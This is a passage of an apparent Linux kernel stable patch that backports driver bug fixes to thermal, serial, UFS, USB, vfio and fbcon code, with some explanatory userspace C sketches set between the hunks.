+ struct tsens_plat_data data_8976 = {
+ 	.num_sensors	= 11,
+ 	.ops		= &ops_8976,
+diff --git a/drivers/thermal/qcom/tsens.c b/drivers/thermal/qcom/tsens.c
+index b5b136ff323f9..b191e19df93dc 100644
+--- a/drivers/thermal/qcom/tsens.c
++++ b/drivers/thermal/qcom/tsens.c
+@@ -983,6 +983,9 @@ static const struct of_device_id tsens_table[] = {
+ 	}, {
+ 		.compatible = "qcom,msm8939-tsens",
+ 		.data = &data_8939,
++	}, {
++		.compatible = "qcom,msm8956-tsens",
++		.data = &data_8956,
+ 	}, {
+ 		.compatible = "qcom,msm8960-tsens",
+ 		.data = &data_8960,
+diff --git a/drivers/thermal/qcom/tsens.h b/drivers/thermal/qcom/tsens.h
+index 899af128855f7..7dd5fc2468945 100644
+--- a/drivers/thermal/qcom/tsens.h
++++ b/drivers/thermal/qcom/tsens.h
+@@ -594,7 +594,7 @@ extern struct tsens_plat_data data_8960;
+ extern struct tsens_plat_data data_8916, data_8939, data_8974, data_9607;
+ 
+ /* TSENS v1 targets */
+-extern struct tsens_plat_data data_tsens_v1, data_8976;
++extern struct tsens_plat_data data_tsens_v1, data_8976, data_8956;
+ 
+ /* TSENS v2 targets */
+ extern struct tsens_plat_data data_8996, data_ipq8074, data_tsens_v2;
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index 5e69fb73f570f..23910ac724b11 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -1387,9 +1387,9 @@ static int lpuart32_config_rs485(struct uart_port *port, struct ktermios *termio
+ 		 * Note: UART is assumed to be active high.
+ 		 */
+ 		if (rs485->flags & SER_RS485_RTS_ON_SEND)
+-			modem &= ~UARTMODEM_TXRTSPOL;
+-		else if (rs485->flags & SER_RS485_RTS_AFTER_SEND)
+ 			modem |= UARTMODEM_TXRTSPOL;
++		else if (rs485->flags & SER_RS485_RTS_AFTER_SEND)
++			modem &= ~UARTMODEM_TXRTSPOL;
+ 	}
+ 
+ 	lpuart32_write(&sport->port, modem, UARTMODIR);
+@@ -1683,12 +1683,6 @@ static void lpuart32_configure(struct lpuart_port *sport)
+ {
+ 	unsigned long temp;
+ 
+-	if (sport->lpuart_dma_rx_use) {
+-		/* RXWATER must be 0 */
+-		temp = lpuart32_read(&sport->port, UARTWATER);
+-		temp &= ~(UARTWATER_WATER_MASK << UARTWATER_RXWATER_OFF);
+-		lpuart32_write(&sport->port, temp, UARTWATER);
+-	}
+ 	temp = lpuart32_read(&sport->port, UARTCTRL);
+ 	if (!sport->lpuart_dma_rx_use)
+ 		temp |= UARTCTRL_RIE;
+@@ -1796,6 +1790,15 @@ static void lpuart32_shutdown(struct uart_port *port)
+ 
+ 	spin_lock_irqsave(&port->lock, flags);
+ 
++	/* clear status */
++	temp = lpuart32_read(&sport->port, UARTSTAT);
++	lpuart32_write(&sport->port, temp, UARTSTAT);
++
++	/* disable Rx/Tx DMA */
++	temp = lpuart32_read(port, UARTBAUD);
++	temp &= ~(UARTBAUD_TDMAE | UARTBAUD_RDMAE);
++	lpuart32_write(port, temp, UARTBAUD);
++
+ 	/* disable Rx/Tx and interrupts */
+ 	temp = lpuart32_read(port, UARTCTRL);
+ 	temp &= ~(UARTCTRL_TE | UARTCTRL_RE |
+diff --git a/drivers/tty/serial/imx.c b/drivers/tty/serial/imx.c
+index 757825edb0cd9..5f35343f81309 100644
+--- a/drivers/tty/serial/imx.c
++++ b/drivers/tty/serial/imx.c
+@@ -2374,6 +2374,11 @@ static int imx_uart_probe(struct platform_device *pdev)
+ 	ucr1 &= ~(UCR1_ADEN | UCR1_TRDYEN | UCR1_IDEN | UCR1_RRDYEN | UCR1_RTSDEN);
+ 	imx_uart_writel(sport, ucr1, UCR1);
+ 
++	/* Disable Ageing Timer interrupt */
++	ucr2 = imx_uart_readl(sport, UCR2);
++	ucr2 &= ~UCR2_ATEN;
++	imx_uart_writel(sport, ucr2, UCR2);
++
+ 	/*
+ 	 * In case RS485 is enabled without GPIO RTS control, the UART IP
+ 	 * is used to control CTS signal. Keep both the UART and Receiver
+diff --git a/drivers/tty/serial/serial-tegra.c b/drivers/tty/serial/serial-tegra.c
+index e5b9773db5e36..1cf08b33456c9 100644
+--- a/drivers/tty/serial/serial-tegra.c
++++ b/drivers/tty/serial/serial-tegra.c
+@@ -1046,6 +1046,7 @@ static int tegra_uart_hw_init(struct tegra_uart_port *tup)
+ 	if (tup->cdata->fifo_mode_enable_status) {
+ 		ret = tegra_uart_wait_fifo_mode_enabled(tup);
+ 		if (ret < 0) {
++			clk_disable_unprepare(tup->uart_clk);
+ 			dev_err(tup->uport.dev,
+ 				"Failed to enable FIFO mode: %d\n", ret);
+ 			return ret;
+@@ -1067,6 +1068,7 @@ static int tegra_uart_hw_init(struct tegra_uart_port *tup)
+ 	 */
+ 	ret = tegra_set_baudrate(tup, TEGRA_UART_DEFAULT_BAUD);
+ 	if (ret < 0) {
++		clk_disable_unprepare(tup->uart_clk);
+ 		dev_err(tup->uport.dev, "Failed to set baud rate\n");
+ 		return ret;
+ 	}
+@@ -1226,10 +1228,13 @@ static int tegra_uart_startup(struct uart_port *u)
+ 				dev_name(u->dev), tup);
+ 	if (ret < 0) {
+ 		dev_err(u->dev, "Failed to register ISR for IRQ %d\n", u->irq);
+-		goto fail_hw_init;
++		goto fail_request_irq;
+ 	}
+ 	return 0;
+ 
++fail_request_irq:
++	/* tup->uart_clk is already enabled in tegra_uart_hw_init */
++	clk_disable_unprepare(tup->uart_clk);
+ fail_hw_init:
+ 	if (!tup->use_rx_pio)
+ 		tegra_uart_dma_channel_free(tup, true);
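
The serial-tegra hunks above plug a clock leak: every early return taken after the clock was enabled must now undo it. A minimal userspace sketch of the same unwind-in-reverse-order idiom, with stand-in functions (nothing below is kernel API):

#include <stdio.h>

/* Stand-ins for clk_prepare_enable()/clk_disable_unprepare() etc. */
static int enable_clock(void)   { puts("clock on");  return 0; }
static void disable_clock(void) { puts("clock off"); }
static int request_irq_sketch(int fail) { return fail ? -1 : 0; }

static int hw_init_sketch(int fail_irq)
{
	int ret = enable_clock();

	if (ret)
		return ret;

	ret = request_irq_sketch(fail_irq);
	if (ret)
		goto err_irq;	/* unwind in reverse order of acquisition */

	return 0;

err_irq:
	disable_clock();	/* an early return must not leak the clock */
	return ret;
}

int main(void)
{
	printf("ok path: %d\n", hw_init_sketch(0));
	printf("err path: %d\n", hw_init_sketch(1));
	return 0;
}
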
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index 3a1c4d31e010d..2ddc1aba0ad75 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -3008,6 +3008,22 @@ retry:
+ 		} else {
+ 			dev_err(hba->dev, "%s: failed to clear tag %d\n",
+ 				__func__, lrbp->task_tag);
++
++			spin_lock_irqsave(&hba->outstanding_lock, flags);
++			pending = test_bit(lrbp->task_tag,
++					   &hba->outstanding_reqs);
++			if (pending)
++				hba->dev_cmd.complete = NULL;
++			spin_unlock_irqrestore(&hba->outstanding_lock, flags);
++
++			if (!pending) {
++				/*
++				 * The completion handler ran while we tried to
++				 * clear the command.
++				 */
++				time_left = 1;
++				goto retry;
++			}
+ 		}
+ 	}
+ 
+@@ -5030,8 +5046,8 @@ static int ufshcd_slave_configure(struct scsi_device *sdev)
+ 	ufshcd_hpb_configure(hba, sdev);
+ 
+ 	blk_queue_update_dma_pad(q, PRDT_DATA_BYTE_COUNT_PAD - 1);
+-	if (hba->quirks & UFSHCD_QUIRK_ALIGN_SG_WITH_PAGE_SIZE)
+-		blk_queue_update_dma_alignment(q, PAGE_SIZE - 1);
++	if (hba->quirks & UFSHCD_QUIRK_4KB_DMA_ALIGNMENT)
++		blk_queue_update_dma_alignment(q, 4096 - 1);
+ 	/*
+ 	 * Block runtime-pm until all consumers are added.
+ 	 * Refer ufshcd_setup_links().
+diff --git a/drivers/ufs/host/ufs-exynos.c b/drivers/ufs/host/ufs-exynos.c
+index c3628a8645a56..3cdac89a28b81 100644
+--- a/drivers/ufs/host/ufs-exynos.c
++++ b/drivers/ufs/host/ufs-exynos.c
+@@ -1673,7 +1673,7 @@ static const struct exynos_ufs_drv_data exynos_ufs_drvs = {
+ 				  UFSHCD_QUIRK_BROKEN_OCS_FATAL_ERROR |
+ 				  UFSHCI_QUIRK_SKIP_MANUAL_WB_FLUSH_CTRL |
+ 				  UFSHCD_QUIRK_SKIP_DEF_UNIPRO_TIMEOUT_SETTING |
+-				  UFSHCD_QUIRK_ALIGN_SG_WITH_PAGE_SIZE,
++				  UFSHCD_QUIRK_4KB_DMA_ALIGNMENT,
+ 	.opts			= EXYNOS_UFS_OPT_HAS_APB_CLK_CTRL |
+ 				  EXYNOS_UFS_OPT_BROKEN_AUTO_CLK_CTRL |
+ 				  EXYNOS_UFS_OPT_BROKEN_RX_SEL_IDX |
+diff --git a/drivers/usb/early/xhci-dbc.c b/drivers/usb/early/xhci-dbc.c
+index 7970471548202..f3e23be227d41 100644
+--- a/drivers/usb/early/xhci-dbc.c
++++ b/drivers/usb/early/xhci-dbc.c
+@@ -874,7 +874,8 @@ retry:
+ 
+ static void early_xdbc_write(struct console *con, const char *str, u32 n)
+ {
+-	static char buf[XDBC_MAX_PACKET];
++	/* static variables are zeroed, so buf is always NULL terminated */
++	static char buf[XDBC_MAX_PACKET + 1];
+ 	int chunk, ret;
+ 	int use_cr = 0;
+ 
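
The xhci-dbc hunk above grows the static buffer by one byte so the terminator can never be overwritten: static storage is zero-initialized, so the final byte starts out NUL and stays NUL as long as writes are capped at XDBC_MAX_PACKET. A small standalone sketch of the idea (MAX_PACKET and emit() are invented for the example):

#include <stdio.h>
#include <string.h>

#define MAX_PACKET 8	/* stand-in for XDBC_MAX_PACKET */

static void emit(const char *str, size_t n)
{
	/*
	 * One spare byte: the copy below never touches buf[MAX_PACKET],
	 * so that byte stays NUL and buf is always a valid C string.
	 */
	static char buf[MAX_PACKET + 1];

	while (n) {
		size_t chunk = n < MAX_PACKET ? n : MAX_PACKET;

		memcpy(buf, str, chunk);
		buf[chunk] = '\0';	/* terminate short chunks too */
		printf("chunk: \"%s\"\n", buf);
		str += chunk;
		n -= chunk;
	}
}

int main(void)
{
	emit("hello, debug console", 20);
	return 0;
}
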
+diff --git a/drivers/usb/fotg210/fotg210-udc.c b/drivers/usb/fotg210/fotg210-udc.c
+index eb076746f0320..7ba7fb52ddaac 100644
+--- a/drivers/usb/fotg210/fotg210-udc.c
++++ b/drivers/usb/fotg210/fotg210-udc.c
+@@ -710,6 +710,20 @@ static int fotg210_is_epnstall(struct fotg210_ep *ep)
+ 	return value & INOUTEPMPSR_STL_EP ? 1 : 0;
+ }
+ 
++/* For EP0 requests triggered by this driver (currently GET_STATUS response) */
++static void fotg210_ep0_complete(struct usb_ep *_ep, struct usb_request *req)
++{
++	struct fotg210_ep *ep;
++	struct fotg210_udc *fotg210;
++
++	ep = container_of(_ep, struct fotg210_ep, ep);
++	fotg210 = ep->fotg210;
++
++	if (req->status || req->actual != req->length) {
++		dev_warn(&fotg210->gadget.dev, "EP0 request failed: %d\n", req->status);
++	}
++}
++
+ static void fotg210_get_status(struct fotg210_udc *fotg210,
+ 				struct usb_ctrlrequest *ctrl)
+ {
+@@ -1261,6 +1275,8 @@ int fotg210_udc_probe(struct platform_device *pdev)
+ 	if (fotg210->ep0_req == NULL)
+ 		goto err_map;
+ 
++	fotg210->ep0_req->complete = fotg210_ep0_complete;
++
+ 	fotg210_init(fotg210);
+ 
+ 	fotg210_disable_unplug(fotg210);
+diff --git a/drivers/usb/gadget/configfs.c b/drivers/usb/gadget/configfs.c
+index 0853536cbf2e6..2ff34dc129c40 100644
+--- a/drivers/usb/gadget/configfs.c
++++ b/drivers/usb/gadget/configfs.c
+@@ -430,6 +430,12 @@ static int config_usb_cfg_link(
+ 	 * from another gadget or a random directory.
+ 	 * Also a function instance can only be linked once.
+ 	 */
++
++	if (gi->composite.gadget_driver.udc_name) {
++		ret = -EINVAL;
++		goto out;
++	}
++
+ 	list_for_each_entry(iter, &gi->available_func, cfs_list) {
+ 		if (iter != fi)
+ 			continue;
+diff --git a/drivers/usb/gadget/udc/fusb300_udc.c b/drivers/usb/gadget/udc/fusb300_udc.c
+index 5954800d652ca..08ba9c8c1e677 100644
+--- a/drivers/usb/gadget/udc/fusb300_udc.c
++++ b/drivers/usb/gadget/udc/fusb300_udc.c
+@@ -1346,6 +1346,7 @@ static int fusb300_remove(struct platform_device *pdev)
+ 	usb_del_gadget_udc(&fusb300->gadget);
+ 	iounmap(fusb300->reg);
+ 	free_irq(platform_get_irq(pdev, 0), fusb300);
++	free_irq(platform_get_irq(pdev, 1), fusb300);
+ 
+ 	fusb300_free_request(&fusb300->ep[0]->ep, fusb300->ep0_req);
+ 	for (i = 0; i < FUSB300_MAX_NUM_EP; i++)
+@@ -1431,7 +1432,7 @@ static int fusb300_probe(struct platform_device *pdev)
+ 			IRQF_SHARED, udc_name, fusb300);
+ 	if (ret < 0) {
+ 		pr_err("request_irq1 error (%d)\n", ret);
+-		goto clean_up;
++		goto err_request_irq1;
+ 	}
+ 
+ 	INIT_LIST_HEAD(&fusb300->gadget.ep_list);
+@@ -1470,7 +1471,7 @@ static int fusb300_probe(struct platform_device *pdev)
+ 				GFP_KERNEL);
+ 	if (fusb300->ep0_req == NULL) {
+ 		ret = -ENOMEM;
+-		goto clean_up3;
++		goto err_alloc_request;
+ 	}
+ 
+ 	init_controller(fusb300);
+@@ -1485,7 +1486,10 @@ static int fusb300_probe(struct platform_device *pdev)
+ err_add_udc:
+ 	fusb300_free_request(&fusb300->ep[0]->ep, fusb300->ep0_req);
+ 
+-clean_up3:
++err_alloc_request:
++	free_irq(ires1->start, fusb300);
++
++err_request_irq1:
+ 	free_irq(ires->start, fusb300);
+ 
+ clean_up:
+diff --git a/drivers/usb/host/fsl-mph-dr-of.c b/drivers/usb/host/fsl-mph-dr-of.c
+index e5df175228928..46c6a152b8655 100644
+--- a/drivers/usb/host/fsl-mph-dr-of.c
++++ b/drivers/usb/host/fsl-mph-dr-of.c
+@@ -112,8 +112,7 @@ static struct platform_device *fsl_usb2_device_register(
+ 			goto error;
+ 	}
+ 
+-	pdev->dev.of_node = ofdev->dev.of_node;
+-	pdev->dev.of_node_reused = true;
++	device_set_of_node_from_dev(&pdev->dev, &ofdev->dev);
+ 
+ 	retval = platform_device_add(pdev);
+ 	if (retval)
+diff --git a/drivers/usb/host/max3421-hcd.c b/drivers/usb/host/max3421-hcd.c
+index 352e3ac2b377b..19111e83ac131 100644
+--- a/drivers/usb/host/max3421-hcd.c
++++ b/drivers/usb/host/max3421-hcd.c
+@@ -1436,7 +1436,7 @@ max3421_spi_thread(void *dev_id)
+ 			 * use spi_wr_buf().
+ 			 */
+ 			for (i = 0; i < ARRAY_SIZE(max3421_hcd->iopins); ++i) {
+-				u8 val = spi_rd8(hcd, MAX3421_REG_IOPINS1);
++				u8 val = spi_rd8(hcd, MAX3421_REG_IOPINS1 + i);
+ 
+ 				val = ((val & 0xf0) |
+ 				       (max3421_hcd->iopins[i] & 0x0f));
+diff --git a/drivers/usb/musb/mediatek.c b/drivers/usb/musb/mediatek.c
+index cad991380b0cf..27b9bd2583400 100644
+--- a/drivers/usb/musb/mediatek.c
++++ b/drivers/usb/musb/mediatek.c
+@@ -294,7 +294,8 @@ static int mtk_musb_init(struct musb *musb)
+ err_phy_power_on:
+ 	phy_exit(glue->phy);
+ err_phy_init:
+-	mtk_otg_switch_exit(glue);
++	if (musb->port_mode == MUSB_OTG)
++		mtk_otg_switch_exit(glue);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/usb/typec/mux/intel_pmc_mux.c b/drivers/usb/typec/mux/intel_pmc_mux.c
+index fdbf3694e21f4..87e2c91306070 100644
+--- a/drivers/usb/typec/mux/intel_pmc_mux.c
++++ b/drivers/usb/typec/mux/intel_pmc_mux.c
+@@ -614,8 +614,10 @@ static int pmc_usb_probe_iom(struct pmc_usb *pmc)
+ 
+ 	INIT_LIST_HEAD(&resource_list);
+ 	ret = acpi_dev_get_memory_resources(adev, &resource_list);
+-	if (ret < 0)
++	if (ret < 0) {
++		acpi_dev_put(adev);
+ 		return ret;
++	}
+ 
+ 	rentry = list_first_entry_or_null(&resource_list, struct resource_entry, node);
+ 	if (rentry)
+diff --git a/drivers/vfio/group.c b/drivers/vfio/group.c
+index bb24b2f0271e0..855db15477813 100644
+--- a/drivers/vfio/group.c
++++ b/drivers/vfio/group.c
+@@ -137,7 +137,7 @@ static int vfio_group_ioctl_set_container(struct vfio_group *group,
+ 
+ 		ret = iommufd_vfio_compat_ioas_id(iommufd, &ioas_id);
+ 		if (ret) {
+-			iommufd_ctx_put(group->iommufd);
++			iommufd_ctx_put(iommufd);
+ 			goto out_unlock;
+ 		}
+ 
+diff --git a/drivers/vfio/vfio_iommu_type1.c b/drivers/vfio/vfio_iommu_type1.c
+index 2209372f236db..7fa68dc4e938a 100644
+--- a/drivers/vfio/vfio_iommu_type1.c
++++ b/drivers/vfio/vfio_iommu_type1.c
+@@ -100,6 +100,8 @@ struct vfio_dma {
+ 	struct task_struct	*task;
+ 	struct rb_root		pfn_list;	/* Ex-user pinned pfn list */
+ 	unsigned long		*bitmap;
++	struct mm_struct	*mm;
++	size_t			locked_vm;
+ };
+ 
+ struct vfio_batch {
+@@ -412,6 +414,19 @@ static int vfio_iova_put_vfio_pfn(struct vfio_dma *dma, struct vfio_pfn *vpfn)
+ 	return ret;
+ }
+ 
++static int mm_lock_acct(struct task_struct *task, struct mm_struct *mm,
++			bool lock_cap, long npage)
++{
++	int ret = mmap_write_lock_killable(mm);
++
++	if (ret)
++		return ret;
++
++	ret = __account_locked_vm(mm, abs(npage), npage > 0, task, lock_cap);
++	mmap_write_unlock(mm);
++	return ret;
++}
++
+ static int vfio_lock_acct(struct vfio_dma *dma, long npage, bool async)
+ {
+ 	struct mm_struct *mm;
+@@ -420,16 +435,13 @@ static int vfio_lock_acct(struct vfio_dma *dma, long npage, bool async)
+ 	if (!npage)
+ 		return 0;
+ 
+-	mm = async ? get_task_mm(dma->task) : dma->task->mm;
+-	if (!mm)
++	mm = dma->mm;
++	if (async && !mmget_not_zero(mm))
+ 		return -ESRCH; /* process exited */
+ 
+-	ret = mmap_write_lock_killable(mm);
+-	if (!ret) {
+-		ret = __account_locked_vm(mm, abs(npage), npage > 0, dma->task,
+-					  dma->lock_cap);
+-		mmap_write_unlock(mm);
+-	}
++	ret = mm_lock_acct(dma->task, mm, dma->lock_cap, npage);
++	if (!ret)
++		dma->locked_vm += npage;
+ 
+ 	if (async)
+ 		mmput(mm);
+@@ -794,8 +806,8 @@ static int vfio_pin_page_external(struct vfio_dma *dma, unsigned long vaddr,
+ 	struct mm_struct *mm;
+ 	int ret;
+ 
+-	mm = get_task_mm(dma->task);
+-	if (!mm)
++	mm = dma->mm;
++	if (!mmget_not_zero(mm))
+ 		return -ENODEV;
+ 
+ 	ret = vaddr_get_pfns(mm, vaddr, 1, dma->prot, pfn_base, pages);
+@@ -805,7 +817,7 @@ static int vfio_pin_page_external(struct vfio_dma *dma, unsigned long vaddr,
+ 	ret = 0;
+ 
+ 	if (do_accounting && !is_invalid_reserved_pfn(*pfn_base)) {
+-		ret = vfio_lock_acct(dma, 1, true);
++		ret = vfio_lock_acct(dma, 1, false);
+ 		if (ret) {
+ 			put_pfn(*pfn_base, dma->prot);
+ 			if (ret == -ENOMEM)
+@@ -861,6 +873,12 @@ static int vfio_iommu_type1_pin_pages(void *iommu_data,
+ 
+ 	mutex_lock(&iommu->lock);
+ 
++	if (WARN_ONCE(iommu->vaddr_invalid_count,
++		      "vfio_pin_pages not allowed with VFIO_UPDATE_VADDR\n")) {
++		ret = -EBUSY;
++		goto pin_done;
++	}
++
+ 	/*
+ 	 * Wait for all necessary vaddr's to be valid so they can be used in
+ 	 * the main loop without dropping the lock, to avoid racing vs unmap.
+@@ -1174,6 +1192,7 @@ static void vfio_remove_dma(struct vfio_iommu *iommu, struct vfio_dma *dma)
+ 	vfio_unmap_unpin(iommu, dma, true);
+ 	vfio_unlink_dma(iommu, dma);
+ 	put_task_struct(dma->task);
++	mmdrop(dma->mm);
+ 	vfio_dma_bitmap_free(dma);
+ 	if (dma->vaddr_invalid) {
+ 		iommu->vaddr_invalid_count--;
+@@ -1343,6 +1362,12 @@ static int vfio_dma_do_unmap(struct vfio_iommu *iommu,
+ 
+ 	mutex_lock(&iommu->lock);
+ 
++	/* Cannot update vaddr if mdev is present. */
++	if (invalidate_vaddr && !list_empty(&iommu->emulated_iommu_groups)) {
++		ret = -EBUSY;
++		goto unlock;
++	}
++
+ 	pgshift = __ffs(iommu->pgsize_bitmap);
+ 	pgsize = (size_t)1 << pgshift;
+ 
+@@ -1566,6 +1591,38 @@ static bool vfio_iommu_iova_dma_valid(struct vfio_iommu *iommu,
+ 	return list_empty(iova);
+ }
+ 
++static int vfio_change_dma_owner(struct vfio_dma *dma)
++{
++	struct task_struct *task = current->group_leader;
++	struct mm_struct *mm = current->mm;
++	long npage = dma->locked_vm;
++	bool lock_cap;
++	int ret;
++
++	if (mm == dma->mm)
++		return 0;
++
++	lock_cap = capable(CAP_IPC_LOCK);
++	ret = mm_lock_acct(task, mm, lock_cap, npage);
++	if (ret)
++		return ret;
++
++	if (mmget_not_zero(dma->mm)) {
++		mm_lock_acct(dma->task, dma->mm, dma->lock_cap, -npage);
++		mmput(dma->mm);
++	}
++
++	if (dma->task != task) {
++		put_task_struct(dma->task);
++		dma->task = get_task_struct(task);
++	}
++	mmdrop(dma->mm);
++	dma->mm = mm;
++	mmgrab(dma->mm);
++	dma->lock_cap = lock_cap;
++	return 0;
++}
++
+ static int vfio_dma_do_map(struct vfio_iommu *iommu,
+ 			   struct vfio_iommu_type1_dma_map *map)
+ {
+@@ -1615,6 +1672,9 @@ static int vfio_dma_do_map(struct vfio_iommu *iommu,
+ 			   dma->size != size) {
+ 			ret = -EINVAL;
+ 		} else {
++			ret = vfio_change_dma_owner(dma);
++			if (ret)
++				goto out_unlock;
+ 			dma->vaddr = vaddr;
+ 			dma->vaddr_invalid = false;
+ 			iommu->vaddr_invalid_count--;
+@@ -1652,29 +1712,15 @@ static int vfio_dma_do_map(struct vfio_iommu *iommu,
+ 	 * against the locked memory limit and we need to be able to do both
+ 	 * outside of this call path as pinning can be asynchronous via the
+ 	 * external interfaces for mdev devices.  RLIMIT_MEMLOCK requires a
+-	 * task_struct and VM locked pages requires an mm_struct, however
+-	 * holding an indefinite mm reference is not recommended, therefore we
+-	 * only hold a reference to a task.  We could hold a reference to
+-	 * current, however QEMU uses this call path through vCPU threads,
+-	 * which can be killed resulting in a NULL mm and failure in the unmap
+-	 * path when called via a different thread.  Avoid this problem by
+-	 * using the group_leader as threads within the same group require
+-	 * both CLONE_THREAD and CLONE_VM and will therefore use the same
+-	 * mm_struct.
+-	 *
+-	 * Previously we also used the task for testing CAP_IPC_LOCK at the
+-	 * time of pinning and accounting, however has_capability() makes use
+-	 * of real_cred, a copy-on-write field, so we can't guarantee that it
+-	 * matches group_leader, or in fact that it might not change by the
+-	 * time it's evaluated.  If a process were to call MAP_DMA with
+-	 * CAP_IPC_LOCK but later drop it, it doesn't make sense that they
+-	 * possibly see different results for an iommu_mapped vfio_dma vs
+-	 * externally mapped.  Therefore track CAP_IPC_LOCK in vfio_dma at the
+-	 * time of calling MAP_DMA.
++	 * task_struct. Save the group_leader so that all DMA tracking uses
++	 * the same task, to make debugging easier.  VM locked pages requires
++	 * an mm_struct, so grab the mm in case the task dies.
+ 	 */
+ 	get_task_struct(current->group_leader);
+ 	dma->task = current->group_leader;
+ 	dma->lock_cap = capable(CAP_IPC_LOCK);
++	dma->mm = current->mm;
++	mmgrab(dma->mm);
+ 
+ 	dma->pfn_list = RB_ROOT;
+ 
+@@ -2194,11 +2240,16 @@ static int vfio_iommu_type1_attach_group(void *iommu_data,
+ 	struct iommu_domain_geometry *geo;
+ 	LIST_HEAD(iova_copy);
+ 	LIST_HEAD(group_resv_regions);
+-	int ret = -EINVAL;
++	int ret = -EBUSY;
+ 
+ 	mutex_lock(&iommu->lock);
+ 
++	/* Attach could require pinning, so disallow while vaddr is invalid. */
++	if (iommu->vaddr_invalid_count)
++		goto out_unlock;
++
+ 	/* Check for duplicates */
++	ret = -EINVAL;
+ 	if (vfio_iommu_find_iommu_group(iommu, iommu_group))
+ 		goto out_unlock;
+ 
+@@ -2669,6 +2720,16 @@ static int vfio_domains_have_enforce_cache_coherency(struct vfio_iommu *iommu)
+ 	return ret;
+ }
+ 
++static bool vfio_iommu_has_emulated(struct vfio_iommu *iommu)
++{
++	bool ret;
++
++	mutex_lock(&iommu->lock);
++	ret = !list_empty(&iommu->emulated_iommu_groups);
++	mutex_unlock(&iommu->lock);
++	return ret;
++}
++
+ static int vfio_iommu_type1_check_extension(struct vfio_iommu *iommu,
+ 					    unsigned long arg)
+ {
+@@ -2677,8 +2738,13 @@ static int vfio_iommu_type1_check_extension(struct vfio_iommu *iommu,
+ 	case VFIO_TYPE1v2_IOMMU:
+ 	case VFIO_TYPE1_NESTING_IOMMU:
+ 	case VFIO_UNMAP_ALL:
+-	case VFIO_UPDATE_VADDR:
+ 		return 1;
++	case VFIO_UPDATE_VADDR:
++		/*
++		 * Disable this feature if mdevs are present.  They cannot
++		 * safely pin/unpin/rw while vaddrs are being updated.
++		 */
++		return iommu && !vfio_iommu_has_emulated(iommu);
+ 	case VFIO_DMA_CC_IOMMU:
+ 		if (!iommu)
+ 			return 0;
+@@ -3099,9 +3165,8 @@ static int vfio_iommu_type1_dma_rw_chunk(struct vfio_iommu *iommu,
+ 			!(dma->prot & IOMMU_READ))
+ 		return -EPERM;
+ 
+-	mm = get_task_mm(dma->task);
+-
+-	if (!mm)
++	mm = dma->mm;
++	if (!mmget_not_zero(mm))
+ 		return -EPERM;
+ 
+ 	if (kthread)
+@@ -3147,6 +3212,13 @@ static int vfio_iommu_type1_dma_rw(void *iommu_data, dma_addr_t user_iova,
+ 	size_t done;
+ 
+ 	mutex_lock(&iommu->lock);
++
++	if (WARN_ONCE(iommu->vaddr_invalid_count,
++		      "vfio_dma_rw not allowed with VFIO_UPDATE_VADDR\n")) {
++		ret = -EBUSY;
++		goto out;
++	}
++
+ 	while (count > 0) {
+ 		ret = vfio_iommu_type1_dma_rw_chunk(iommu, user_iova, data,
+ 						    count, write, &done);
+@@ -3158,6 +3230,7 @@ static int vfio_iommu_type1_dma_rw(void *iommu_data, dma_addr_t user_iova,
+ 		user_iova += done;
+ 	}
+ 
++out:
+ 	mutex_unlock(&iommu->lock);
+ 	return ret;
+ }
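
The vfio hunks above switch from re-fetching an mm via the saved task to holding the mm directly, using mmgrab()/mmdrop() to pin the struct itself and mmget_not_zero()/mmput() to pin the address space only while it is actually used. A deliberately simplified userspace analogue of those two refcounts follows (all names are invented; the real teardown is more involved — in particular the kernel's final mmput() also tears down the mappings, which this sketch ignores):

#include <stdio.h>
#include <stdlib.h>

/*
 * Userspace analogue of the two mm_struct refcounts:
 * - mm_count ("grab"): keeps the struct itself allocated
 * - mm_users ("get"):  keeps the address space alive and usable
 */
struct mm_sketch {
	int mm_count;
	int mm_users;
};

static struct mm_sketch *mm_alloc_sketch(void)
{
	struct mm_sketch *mm = malloc(sizeof(*mm));

	mm->mm_count = 1;	/* allocator's grab */
	mm->mm_users = 1;	/* the "process" using it */
	return mm;
}

static void mmgrab_sketch(struct mm_sketch *mm) { mm->mm_count++; }

static void mmdrop_sketch(struct mm_sketch *mm)
{
	if (--mm->mm_count == 0)
		free(mm);	/* last grab gone: struct may be freed */
}

static int mmget_not_zero_sketch(struct mm_sketch *mm)
{
	if (mm->mm_users == 0)
		return 0;	/* process exited: address space is gone */
	mm->mm_users++;
	return 1;
}

static void mmput_sketch(struct mm_sketch *mm) { --mm->mm_users; }

int main(void)
{
	struct mm_sketch *mm = mm_alloc_sketch();

	mmgrab_sketch(mm);	/* long-lived tracker pins the struct only */
	mmput_sketch(mm);	/* the "process" exits */

	if (mmget_not_zero_sketch(mm))
		puts("unexpected: address space still live");
	else
		puts("process gone: pinning would fail with -ESRCH");

	mmdrop_sketch(mm);	/* tracker's grab */
	mmdrop_sketch(mm);	/* allocator's grab */
	return 0;
}
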
+diff --git a/drivers/video/fbdev/core/fbcon.c b/drivers/video/fbdev/core/fbcon.c
+index 1b14c21af2b74..2bc8baa90c0f2 100644
+--- a/drivers/video/fbdev/core/fbcon.c
++++ b/drivers/video/fbdev/core/fbcon.c
+@@ -958,7 +958,7 @@ static const char *fbcon_startup(void)
+ 	set_blitting_type(vc, info);
+ 
+ 	/* Setup default font */
+-	if (!p->fontdata && !vc->vc_font.data) {
++	if (!p->fontdata) {
+ 		if (!fontname[0] || !(font = find_font(fontname)))
+ 			font = get_default_font(info->var.xres,
+ 						info->var.yres,
+@@ -968,8 +968,6 @@ static const char *fbcon_startup(void)
+ 		vc->vc_font.height = font->height;
+ 		vc->vc_font.data = (void *)(p->fontdata = font->data);
+ 		vc->vc_font.charcount = font->charcount;
+-	} else {
+-		p->fontdata = vc->vc_font.data;
+ 	}
+ 
+ 	cols = FBCON_SWAP(ops->rotate, info->var.xres, info->var.yres);
+@@ -1135,9 +1133,9 @@ static void fbcon_init(struct vc_data *vc, int init)
+ 	ops->p = &fb_display[fg_console];
+ }
+ 
+-static void fbcon_free_font(struct fbcon_display *p, bool freefont)
++static void fbcon_free_font(struct fbcon_display *p)
+ {
+-	if (freefont && p->userfont && p->fontdata && (--REFCOUNT(p->fontdata) == 0))
